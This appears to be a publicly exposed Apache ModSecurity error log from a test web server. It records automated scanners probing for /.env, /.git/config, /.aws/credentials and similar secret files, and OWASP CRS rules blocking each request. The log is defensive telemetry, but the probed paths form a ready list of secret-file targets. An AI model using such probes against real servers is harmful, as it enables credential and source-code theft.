Your IP : 216.73.216.189
[Fri Jan 19 08:15:13.282674 2024] [authz_core:error] [pid 464263] [client 139.59.182.142:41838] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 19 08:15:14.540579 2024] [:error] [pid 464290] [client 139.59.182.142:42112] [client 139.59.182.142] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaohgnfzOjfHBsiU0PJXOgAAAAU"]
[Fri Jan 19 08:15:14.540902 2024] [:error] [pid 464290] [client 139.59.182.142:42112] [client 139.59.182.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaohgnfzOjfHBsiU0PJXOgAAAAU"]
[Fri Jan 19 08:15:14.541103 2024] [:error] [pid 464290] [client 139.59.182.142:42112] [client 139.59.182.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaohgnfzOjfHBsiU0PJXOgAAAAU"]
[Fri Jan 19 08:15:15.230172 2024] [:error] [pid 464260] [client 139.59.182.142:42136] [client 139.59.182.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zaohg0AbvbM3U8h5uiL4swAAAAE"]
[Fri Jan 19 08:15:15.230397 2024] [:error] [pid 464260] [client 139.59.182.142:42136] [client 139.59.182.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zaohg0AbvbM3U8h5uiL4swAAAAE"]
[Fri Jan 19 08:15:15.230609 2024] [:error] [pid 464260] [client 139.59.182.142:42136] [client 139.59.182.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zaohg0AbvbM3U8h5uiL4swAAAAE"]
[Fri Jan 19 08:15:15.286283 2024] [:error] [pid 464263] [client 139.59.182.142:42188] [client 139.59.182.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zaohg6RkpmCNg_Yy7MPMQQAAAAo"]
[Fri Jan 19 08:15:15.286511 2024] [:error] [pid 464263] [client 139.59.182.142:42188] [client 139.59.182.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zaohg6RkpmCNg_Yy7MPMQQAAAAo"]
[Fri Jan 19 08:15:15.286685 2024] [:error] [pid 464263] [client 139.59.182.142:42188] [client 139.59.182.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zaohg6RkpmCNg_Yy7MPMQQAAAAo"]
[Fri Jan 19 21:17:18.100204 2024] [:error] [pid 477040] [client 2.58.56.121:50712] [client 2.58.56.121] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZarYzgoCztILCu3sSK1BigAAAAc"]
[Fri Jan 19 21:17:18.100484 2024] [:error] [pid 477040] [client 2.58.56.121:50712] [client 2.58.56.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZarYzgoCztILCu3sSK1BigAAAAc"]
[Fri Jan 19 21:17:18.100652 2024] [:error] [pid 477040] [client 2.58.56.121:50712] [client 2.58.56.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZarYzgoCztILCu3sSK1BigAAAAc"]
[Tue Jan 23 01:41:49.883880 2024] [:error] [pid 551671] [client 171.67.70.229:38602] [client 171.67.70.229] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LTRFFVPATqytXS8_TjAAAAAA"]
[Tue Jan 23 01:41:49.884314 2024] [:error] [pid 551671] [client 171.67.70.229:38602] [client 171.67.70.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LTRFFVPATqytXS8_TjAAAAAA"]
[Tue Jan 23 01:41:49.884503 2024] [:error] [pid 551671] [client 171.67.70.229:38602] [client 171.67.70.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LTRFFVPATqytXS8_TjAAAAAA"]
[Tue Jan 23 01:42:21.934353 2024] [:error] [pid 551657] [client 171.67.70.229:54934] [client 171.67.70.229] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LbQRpkDc_mzSPp8zpnAAAAAc"]
[Tue Jan 23 01:42:21.934783 2024] [:error] [pid 551657] [client 171.67.70.229:54934] [client 171.67.70.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LbQRpkDc_mzSPp8zpnAAAAAc"]
[Tue Jan 23 01:42:21.934979 2024] [:error] [pid 551657] [client 171.67.70.229:54934] [client 171.67.70.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8LbQRpkDc_mzSPp8zpnAAAAAc"]
[Tue Jan 23 01:55:48.242750 2024] [:error] [pid 551655] [client 171.67.70.233:38626] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8OlPLaLmhPewLe2F8pwAAAAAQ"]
[Tue Jan 23 01:55:48.243241 2024] [:error] [pid 551655] [client 171.67.70.233:38626] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8OlPLaLmhPewLe2F8pwAAAAAQ"]
[Tue Jan 23 01:55:48.243475 2024] [:error] [pid 551655] [client 171.67.70.233:38626] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "Za8OlPLaLmhPewLe2F8pwAAAAAQ"]
[Tue Jan 23 04:33:06.861448 2024] [:error] [pid 554155] [client 104.234.204.32:51914] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za8zcj6Y_GBrthwGPGJqpQAAAAE"]
[Tue Jan 23 04:33:06.865449 2024] [:error] [pid 554155] [client 104.234.204.32:51914] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za8zcj6Y_GBrthwGPGJqpQAAAAE"]
[Tue Jan 23 04:33:06.865644 2024] [:error] [pid 554155] [client 104.234.204.32:51914] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za8zcj6Y_GBrthwGPGJqpQAAAAE"]
[Tue Jan 23 07:08:30.843970 2024] [:error] [pid 555148] [client 193.32.162.180:54702] [client 193.32.162.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za9X3kicpoJXJDuwGJgUUgAAAAY"]
[Tue Jan 23 07:08:30.844367 2024] [:error] [pid 555148] [client 193.32.162.180:54702] [client 193.32.162.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za9X3kicpoJXJDuwGJgUUgAAAAY"]
[Tue Jan 23 07:08:30.844570 2024] [:error] [pid 555148] [client 193.32.162.180:54702] [client 193.32.162.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za9X3kicpoJXJDuwGJgUUgAAAAY"]
[Tue Jan 23 13:52:46.556241 2024] [:error] [pid 564358] [client 104.234.204.32:36076] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-2nn6UmbGjzytjzN_MdQAAAAs"]
[Tue Jan 23 13:52:46.556637 2024] [:error] [pid 564358] [client 104.234.204.32:36076] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-2nn6UmbGjzytjzN_MdQAAAAs"]
[Tue Jan 23 13:52:46.556879 2024] [:error] [pid 564358] [client 104.234.204.32:36076] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-2nn6UmbGjzytjzN_MdQAAAAs"]
[Tue Jan 23 15:21:52.297612 2024] [:error] [pid 578036] [client 193.32.162.180:48502] [client 193.32.162.180] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_LgCNP_BghtLRJV-O3lwAAAAs"]
[Tue Jan 23 15:21:52.298009 2024] [:error] [pid 578036] [client 193.32.162.180:48502] [client 193.32.162.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_LgCNP_BghtLRJV-O3lwAAAAs"]
[Tue Jan 23 15:21:52.298264 2024] [:error] [pid 578036] [client 193.32.162.180:48502] [client 193.32.162.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_LgCNP_BghtLRJV-O3lwAAAAs"]
[Tue Jan 23 17:24:29.249345 2024] [:error] [pid 580869] [client 3.89.98.136:37886] [client 3.89.98.136] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_oPauaOzZV9T4iNpbwNgAAAAQ"]
[Tue Jan 23 17:24:29.249638 2024] [:error] [pid 580869] [client 3.89.98.136:37886] [client 3.89.98.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_oPauaOzZV9T4iNpbwNgAAAAQ"]
[Tue Jan 23 17:24:29.249818 2024] [:error] [pid 580869] [client 3.89.98.136:37886] [client 3.89.98.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_oPauaOzZV9T4iNpbwNgAAAAQ"]
[Thu Jan 25 01:36:58.978357 2024] [:error] [pid 611088] [client 18.206.208.175:45458] [client 18.206.208.175] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbGtKu9evn6TcQxihsHhnQAAAAw"]
[Thu Jan 25 01:36:58.980690 2024] [:error] [pid 611088] [client 18.206.208.175:45458] [client 18.206.208.175] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbGtKu9evn6TcQxihsHhnQAAAAw"]
[Thu Jan 25 01:36:58.980925 2024] [:error] [pid 611088] [client 18.206.208.175:45458] [client 18.206.208.175] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbGtKu9evn6TcQxihsHhnQAAAAw"]
[Thu Jan 25 16:21:54.162624 2024] [:error] [pid 623297] [client 138.197.75.188:37098] [client 138.197.75.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbJ8ktmSxdtEP7qx6CUmbAAAAAI"]
